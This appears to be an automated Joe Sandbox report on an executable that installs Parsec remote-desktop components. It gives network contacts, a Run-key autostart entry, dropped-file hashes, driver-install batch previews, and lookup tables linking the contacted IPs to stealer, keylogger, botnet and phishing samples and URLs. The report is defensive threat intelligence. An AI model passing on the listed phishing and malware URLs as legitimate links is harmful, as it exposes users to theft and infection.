https://beautifullyuncluttered.com/ | uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec | parsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | beautifullyuncluttered.com | European Union | 13335 | CLOUDFLARENETUS | true
34.160.111.145 | ifconfig.me | United States | 2686 | ATGS-MMD-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555525
Start date and time: 2024-11-14 03:10:43 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 75
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: uu8v4UUzTU.exe (renamed because the original name is a hash value)
Original Sample Name: 4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
Detection: MAL
Classification: mal42.evad.winEXE@125/200@3/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 110
• Number of non-executed functions: 211
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 192.229.221.95
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:12:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
02:12:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | TT copy.exe | malicious | FormBook
• www.lnnn.fun/u5w9/
188.114.97.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger
• filetransfer.io/data-package/iiEh1iM3/download
188.114.97.3 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger
• paste.ee/d/dc8Ru
188.114.97.3 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger
• paste.ee/d/LOToW
188.114.97.3 | 8dPlV2lT8o.exe | malicious | Simda Stealer
• qegyhig.com/login.php
188.114.97.3 | 7ObLFE2iMK.exe | malicious | Simda Stealer
• lysyvan.com/login.php
188.114.97.3 | UMwpXhA46R.exe | malicious | Simda Stealer
• lysyvan.com/login.php
188.114.97.3 | 1fWgBXPgiT.exe | malicious | Simda Stealer
• lysyvan.com/login.php
188.114.97.3 | Z8eHwAvqAh.exe | malicious | Simda Stealer
• lysyvan.com/login.php
188.114.97.3 | WlCVLbzNph.exe | malicious | Simda Stealer
• lysyvan.com/login.php
34.160.111.145 | Creal.exe | malicious | Creal Stealer
• ifconfig.me/
34.160.111.145 | #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | malicious | Blank Grabber, Creal Stealer
• ifconfig.me/
34.160.111.145 | SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exe | malicious | DarkGate, MailPassView
• myexternalip.com/raw
34.160.111.145 | mek_n_bat.bat | malicious | Unknown
• ifconfig.me/ip
34.160.111.145 | dtyb0ut8vV | malicious | Unknown
• ifconfig.me/
34.160.111.145 | file.exe | malicious | Unknown
• /
34.160.111.145 | file.exe | malicious | Unknown
• /
34.160.111.145 | L9ck4BoFjc.ps1 | malicious | Unknown
• ifconfig.me/
34.160.111.145 | a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dll | malicious | Unknown
• ifconfig.me/ip
34.160.111.145 | a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dll | malicious | Unknown
• ifconfig.me/ip
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ifconfig.me | Creal.exe | malicious | Creal Stealer
• 34.160.111.145
ifconfig.me | #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | malicious | Blank Grabber, Creal Stealer
• 34.160.111.145
ifconfig.me | mek_n_bat.bat | malicious | Unknown
• 34.160.111.145
ifconfig.me | 6Ek4nfs2y1.exe | malicious | PhoenixKeylogger, PureLog Stealer
• 34.117.118.44
ifconfig.me | uJ5c4dQ44E.exe | malicious | Unknown
• 34.117.118.44
ifconfig.me | uJ5c4dQ44E.exe | malicious | Unknown
• 34.117.118.44
ifconfig.me | SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe | malicious | Unknown
• 34.117.118.44
ifconfig.me | SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe | malicious | Unknown
• 34.117.118.44
ifconfig.me | Jv7Z27rOoW.exe | malicious | Unknown
• 34.117.118.44
fp2e7a.wpc.phicdn.net | http://7g.bumbleshrimp.com | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | http://subjectsfaintly.com | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | https://buycode.us/ | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | http://badbutperfect.com | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | http://u48113141.ct.sendgrid.net/ | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | https://vivantskincare.taplink.ws | malicious | HTMLPhisher
• 192.229.221.95
fp2e7a.wpc.phicdn.net | http://percentagesubsequentprosper.com | malicious | Unknown
• 192.229.221.95
fp2e7a.wpc.phicdn.net | https://usps.com-qaze.xyz/l | malicious | Unknown
• 192.229.221.95
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | ICBM.exe | malicious | Xmrig
• 104.26.8.242
CLOUDFLARENETUS | PO NO170300999.exe | malicious | MassLogger RAT
• 188.114.96.3
CLOUDFLARENETUS | http://bit.ly/UCEMPL | malicious | Unknown
• 1.1.1.1
CLOUDFLARENETUS | https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | malicious | Unknown
• 104.18.86.42
CLOUDFLARENETUS | Hess-INV87796-9_588115125.doc | malicious | Unknown
• 104.26.9.44
CLOUDFLARENETUS | Hess-INV87796-9_588115125.doc | malicious | Unknown
• 172.67.69.226
CLOUDFLARENETUS | https://buycode.us/ | malicious | Unknown
• 104.22.44.142
CLOUDFLARENETUS | https://vivantskincare.taplink.ws | malicious | HTMLPhisher
• 104.17.25.14
CLOUDFLARENETUS | sbafla - John Bradley your alert(s) workspace - to review - 11132024.msg | malicious | Unknown
• 188.114.97.3
ATGS-MMD-ASUS | botnet.sh4.elf | malicious | Mirai, Moobot
• 51.63.0.97
ATGS-MMD-ASUS | botnet.m68k.elf | malicious | Mirai, Moobot
• 32.201.52.7
ATGS-MMD-ASUS | botnet.spc.elf | malicious | Mirai, Moobot
• 57.185.6.240
ATGS-MMD-ASUS | https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | malicious | Unknown
• 34.49.241.189
ATGS-MMD-ASUS | https://deltacapitalgroup.us11.list-manage.com/track/click?u=bf383f7aa25923d377aaa8ae2&id=d3424d590b&e=95f75804b2 | malicious | Unknown
• 34.174.242.185
ATGS-MMD-ASUS | https://trckacbm.com/url/ver/714099389/2931216/e7443d1a99daced93ca033af62f22f12 | malicious | Unknown
• 57.128.74.65
ATGS-MMD-ASUS | Pmendon.ext_Reord_Adjustment.docx | malicious | Captcha Phish
• 34.168.114.70
ATGS-MMD-ASUS | botnet.x86.elf | malicious | Mirai, Moobot
• 48.123.197.206
ATGS-MMD-ASUS | aba5298f.msi | malicious | Unknown
• 34.49.241.189
Match | Associated Sample Name / URL | Detection | Threat Name | Context
- | a0e9f5d64349fb13191bc781f81f42e1c39-EmprisaMaldoc.rtf | malicious | Unknown
• 188.114.97.3
• 34.160.111.145
- | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
• 188.114.97.3
• 34.160.111.145
- | file.exe | malicious | LummaC
• 188.114.97.3
• 34.160.111.145
- | file.exe | malicious | LummaC
• 188.114.97.3
• 34.160.111.145
- | file.exe | malicious | LummaC
• 188.114.97.3
• 34.160.111.145
- | medk.msi | malicious | BruteRatel, Latrodectus
• 188.114.97.3
• 34.160.111.145
- | tab.dll.dll | malicious | BruteRatel, Latrodectus
• 188.114.97.3
• 34.160.111.145
- | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
• 188.114.97.3
• 34.160.111.145
- | file.exe | malicious | LummaC
• 188.114.97.3
• 34.160.111.145
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | https://viture.com/windows | malicious | Unknown
C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll | https://viture.com/windows | malicious | Unknown
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: data
Category: dropped
Size (bytes): 11928
Entropy (8bit): 7.349994571032463
Encrypted: false
SSDEEP: 192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
MD5: 1FE1FC7CC73FB17E995D65835D51CA94
SHA1: 249ACF0A3A362B2163127BD76F6D4D6AA463297D
SHA-256: 136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
SHA-512: 31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
Malicious: false
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 173736
Entropy (8bit): 6.232270251717221
Encrypted: false
SSDEEP: 3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
MD5: F09967CC8CC9BF03612DDECB6BF86DAA
SHA1: 166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
SHA-256: 96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
SHA-512: 190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: , Detection: malicious
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: Windows setup INFormation
Category: dropped
Size (bytes): 4122
Entropy (8bit): 3.7080252993527285
Encrypted: false
SSDEEP: 48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
MD5: D8030AFE09A2F984BE00389B31F7039B
SHA1: AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
SHA-256: 34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
SHA-512: 0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
Malicious: false
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: XML 1.0 document, ASCII text, with very long lines (331)
Category: dropped
Size (bytes): 6536
Entropy (8bit): 4.9696208551586025
Encrypted: false
SSDEEP: 96:tK5BbfK9K3H5KSHtMLutn1LuK9xFTxRo0JpAfKOuKtetnJnwgYDxRUmqU21+WJp:ARfK9K9pnJnw1qm/21+WJp
MD5: 481369808B1B657547BCD92A897C58C0
SHA1: 847723989CF3C9C98B64549090E8260C922D9201
SHA-256: E6A9944CA554B25D67B47B4D0DFBADA6EA5AE7CB208B9EC09CFE6132BAB4600F
SHA-512: 42E6E7332DC0A6B14B308A4F04F1AFDFCF950C6FCAA6609DD1730BD0A7AA6D764F56BE05A45E94877B6D4028E0A312029BAA7FA67F49D280F05A6FFE069D9E77
Malicious: false
                              Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>.<instrumentationManifest xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd">. <instrumentation>. <events>. <provider guid="{e0dde897-547a-4ab3-afa1-8ab6490f3563}" messageFileName="%WinDir%\System32\drivers\UMDF\mm.dll" name="Parsec Virtual Display Driver" resourceFileName="%WinDir%\System32\drivers\UMDF\mm.dll" symbol="DriverControlGuid">. <channels>. <importChannel chid="SYSTEM" name="System"/>. </channels>. <templates>. <template tid="tid_load_template">. <data inType="win:Pointer" name="DeviceObjPtr" outType="win:HexInt64"/>. <data inType="win:UInt32" name="Status" outType="win:NTSTATUS"/>. </templat
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 588160
Entropy (8bit): 6.412426868092969
Encrypted: false
SSDEEP: 12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
MD5: E9F2BC8C82AC755F47C7F89D1530F1A1
SHA1: 7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
SHA-256: CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
SHA-512: 86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: , Detection: malicious
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 87168
Entropy (8bit): 7.1566162661131685
Encrypted: false
SSDEEP: 1536:l/T2X/jN2vxZz0DTHUpouvUpdbIMQZEB6d0I7w9xj:lbG7N2kDTHUpouvUpdbkZEEdBMX
MD5: A8482B15BD93524520814369536FECFA
SHA1: 62242CEBCE6E5BB7737127B3D00A66F458A64391
SHA-256: 1E30A0C0FB30C1B09007ABE48909FE05EFB055DBC0A917F4F29D37635319F243
SHA-512: B01FCC9F7CB1F7351062B85D6632CE60C80F8543074A8E95A5CF93C85A76D7CF5F870EC9FDCCC3E2ED959B914D315B34FF3307C8D3B469956925F8FFDC61FDF0
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................=.....@..........................................................+...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:DOS batch file, ASCII text
                              Category:dropped
                              Size (bytes):420
                              Entropy (8bit):5.190650906040986
                              Encrypted:false
                              SSDEEP:12:35CmSrNUiI+ss0z6qfr+iIq99Bz6qFLs91rdajREWV:3+rtIXHzRrNIq99BzsbrcjV
                              MD5:EE1BFB5CCBB3949E3258155E141A68A5
                              SHA1:B79DD1E75E3E7ACD8D21D7B17C86673A6C6383D9
                              SHA-256:1E7C35EB6C296F96AEE5AE4BBBD40395E8019BDE95EF9BEF91260DD8EF03C6D1
                              SHA-512:B37D680F5DAB52536926C718EB1B4C1F0E78552C061756F998E3A3CCB2DC4FBEA15DD1A4B181646A68A2987A22CE225C185C2EF2BB1D10A70C780ADA8CF9F9AA
                              Malicious:false
                               Preview (line breaks restored):
                               @echo off
                               @setlocal

                               set MYDIR=%~dp0
                               pushd "%MYDIR%"

                               start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
                               start /wait .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
                               start /wait .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"

                               popd
                               endlocal
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:DOS batch file, ASCII text
                              Category:dropped
                              Size (bytes):272
                              Entropy (8bit):5.213077826331079
                              Encrypted:false
                              SSDEEP:6:h1d4RPXKB1imilr6cuIUiItAns0NS/zCSm/1Iffr6c6Bux3jEkEWV:35CmSrNUiI+ss0z6qfrkajREWV
                              MD5:FBC8D5E19F89DFFCCD165F44ABF114B4
                              SHA1:A07501EA396A4E29654352CF8ED71C7819109E5D
                              SHA-256:8F503E40A32959D9D2EE5A9E2A3DA627F6ED158E6C87C47EF17F1E5D74F47B9A
                              SHA-512:08739F57B74EA457F505D416C5CC6C50539343EE33E80D76B95CA1A9B8760EAEF9E97712A5824D8C22A7287C819149A6B60E6A08511E292CAC71EF064AD168F6
                              Malicious:false
                               Preview (line breaks restored):
                               @echo off
                               @setlocal

                               set MYDIR=%~dp0
                               pushd "%MYDIR%"

                               start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
                               start /wait .\nefconw.exe --uninstall-driver --inf-path ".\driver\mm.inf"

                               popd
                               endlocal
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):596352
                              Entropy (8bit):6.420504136477356
                              Encrypted:false
                              SSDEEP:12288:qmTp2f8iWOZiu7uRt3eWuHE0e14BdpfVuW70q2cJto9VuZHPq:nTp2f8iWOZiu7uRt3nIE0+4BdpfVuW7Q
                              MD5:DDDEE00430F7A3D52580B7C85D63D9DC
                              SHA1:FF3B7A60062EF85186EA305168CC9BC207A0C5B0
                              SHA-256:002CBD46BBFAA2D9E04A578F7200711B5740BDA119166F111E2590D8B19D3E68
                              SHA-512:FAAC2F9135AA58DDAB6391D4711498A45F51A0429040833AEA8D1F0F7C64EF27435C8A2D9C3E49C8BC8BDFEC276CA455A719E2B401EA34994D57483C8FEFE5BA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|.8..ek..ek..ek.efj..ek.e`jy.ek.eaj..ek.haj..ek.hfj..ek.h`j..ek.h`j..ek.edj..ek..dkl.ek.hlj..ek.h.k..ek...k..ek.hgj..ekRich..ek........PE..d....d.........."......Z...........n.........@.............................p............`..................................................>.......@..x........I.......)...P..........8.......................(.......8............p..0............................text....Y.......Z.................. ..`.rdata..~....p.......^..............@..@.data....?...`...&...@..............@....pdata...I.......J...f..............@..@.detourc.!......."..................@..@.detourd..... ......................@..._RDATA.......0......................@..@.rsrc...x....@......................@..@.reloc.......P......................@..B................................................................................................................
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):588160
                              Entropy (8bit):6.412426868092969
                              Encrypted:false
                              SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                              MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                              SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                              SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                              SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                               Preview (line breaks restored; the sandbox preview ends mid-line):
                               ;
                               ; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS
                               ;

                               [Version]
                               Signature="$WINDOWS NT$"
                               Class=USB
                               ClassGuid={36FC9E60-C465-11CF-8056-444553540000}
                               Provider=%ManufacturerName%
                               CatalogFile=parsecvirtualds.cat
                               DriverVer = 03/06/2024,0.2.8.0
                               PnpLockdown=1

                               [SourceDisksNames]
                               1 = %DiskName%,,,""

                               [SourceDisksFiles]
                               parsecvirtualds.sys = 1,,

                               [DestinationDirs]
                               DefaultDestDir = 12
                               parsecvirtualds.DriverFiles = 12

                               [DefaultInstall.NTamd64]
                               OptionDesc = %parsecvirtualdsServiceDesc%
                               CopyFiles = parsecvirtualds.DriverFiles

                               [DefaultUninstall.NTamd64]
                               LegacyUninstall = 1

                               [parsecvirtualds.DriverFiles]
                               parsecvirtualds.sys

                               [DefaultInstall.NTamd64.Services]
                               AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service

                               [parsecvirtualds.Service]
                               DisplayName = %parsecvirtualdsServiceName%
                               Description = %parsecvirtualdsServiceDesc%
                               ServiceBinary = %12%\parsecvirtualds.sys
                               ServiceType = 1 ; SERVICE_KERNEL_DRI
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
